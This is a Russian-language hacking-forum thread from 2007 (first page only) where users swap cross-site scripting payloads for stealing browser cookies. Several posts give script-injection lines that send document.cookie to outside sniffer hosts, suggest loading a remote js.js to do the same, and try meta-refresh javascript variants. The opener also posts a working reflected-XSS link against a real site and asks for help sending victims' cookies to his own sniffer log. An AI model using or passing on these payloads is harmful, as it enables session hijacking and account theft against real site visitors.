ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу xSs как отправить кукисы на
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

xSs как отправить кукисы на
  #1  
Старый 16.02.2007, 21:13
Аватар для Chakir
Chakir
Познающий
Регистрация: 17.04.2006
Сообщений: 47
Провел на форуме:
605976

Репутация: 14
По умолчанию xSs как отправить кукисы на
пробую так!
Код:
ssss"><script>alert('xss')</script>
всё ок выкибывает исправно!
пробую так
Код:
ssss"><script>alert(document.cookie)</script>
всё ок кидает куки!
пробуё так
Код:
ssss"><script>img = new Image(); img.src = "http://www.klub.h10.ru/snif/s.php?"+document.cookie;</script>
не канает!

как отправить кукисы на http://www.klub.h10.ru/snif/s.php
 
Ответить с цитированием

  #2  
Старый 16.02.2007, 21:26
Аватар для Robin_Hood
Robin_Hood
Участник форума
Регистрация: 30.10.2006
Сообщений: 238
Провел на форуме:
966901

Репутация: 444
Отправить сообщение для Robin_Hood с помощью ICQ
По умолчанию
скорее всего стоит ограничение на длину строки
 
Ответить с цитированием

  #3  
Старый 16.02.2007, 21:37
Аватар для Abra
Abra
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362

Репутация: 175
По умолчанию
Исходный код смотри - что в нем получается.
 
Ответить с цитированием

  #4  
Старый 16.02.2007, 22:03
Аватар для Dagon
Dagon
Познающий
Регистрация: 27.03.2006
Сообщений: 86
Провел на форуме:
972602

Репутация: 52
По умолчанию
попробуй так "><script src=http://site.com/js.js></script>

в js.js - img=new Image();img.src="http://sniffer.ru/s.gif?"+document.cookie;
 
Ответить с цитированием

  #5  
Старый 16.02.2007, 23:24
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
дай линк на сайт.
очень часто нужно писать +escape(document.cookie);
 
Ответить с цитированием

  #6  
Старый 17.02.2007, 00:39
Аватар для ya_mag
ya_mag
Познающий
Регистрация: 18.01.2007
Сообщений: 63
Провел на форуме:
292941

Репутация: 27
По умолчанию
может и мне кто поможет? нашол вот такой xss
<meta http-equiv=Refresh content=0;url=javascript:alert("OK")>
пишеш
<meta http-equiv=Refresh content=0;url=javascript:document.cookie> показывает куки...
делаю ссылку на фаил js.js на снифер ничего не приходит
ссылку делаю вот так
<meta http-equiv=Refresh content=0;url=javascript:http://my_site/js.js>
и вот так вот пробывал
<meta http-equiv=Refresh content=0;url=javascript:new Image();img.src="http://my_site/s.gif?"+document.cookie;>
может я неправильно ссылку ставлю?
Последний раз редактировалось ya_mag; 17.02.2007 в 01:21..
 
Ответить с цитированием

  #7  
Старый 17.02.2007, 00:44
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию
без javascript в url
и на хтмл страницу со скриптом
Последний раз редактировалось Green_Bear; 17.02.2007 в 01:29..
 
Ответить с цитированием

  #8  
Старый 17.02.2007, 01:25
Аватар для ya_mag
ya_mag
Познающий
Регистрация: 18.01.2007
Сообщений: 63
Провел на форуме:
292941

Репутация: 27
По умолчанию
Цитата:
Сообщение от Green_Bear  
без javascript в url
без javascript просто открыват внутренность того чтонаписанно в js.js
 
Ответить с цитированием

  #9  
Старый 17.02.2007, 15:11
Аватар для Chakir
Chakir
Познающий
Регистрация: 17.04.2006
Сообщений: 47
Провел на форуме:
605976

Репутация: 14
По умолчанию
народ вот xss на апорт.ру а как сделать чтобы она кукисы на http://www.klub.h10.ru/snif/s.php отсылала? логи смотреть тут http://www.klub.h10.ru/snif/log.php
помогите кто поможет таму +
кому помог я тот мне + =)
Код:
http://sm.aport.ru/scripts/template.dll?That=std&r=%22%3E%3Cscript%3Ealert%28%27XSS_by_Chakir%27%29%3C%2Fscript%3E
 
Ответить с цитированием

  #10  
Старый 24.02.2007, 09:00
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию
подскажте как провести xss, если все что идёт после "/" режется?
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как стать хакером! foreva Болталка 19 12.12.2007 00:12
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал Дрэгги Болталка 21 22.07.2007 12:33
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Как использовать cross-site scripting (css) foreva Чужие Статьи 0 06.02.2005 19:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ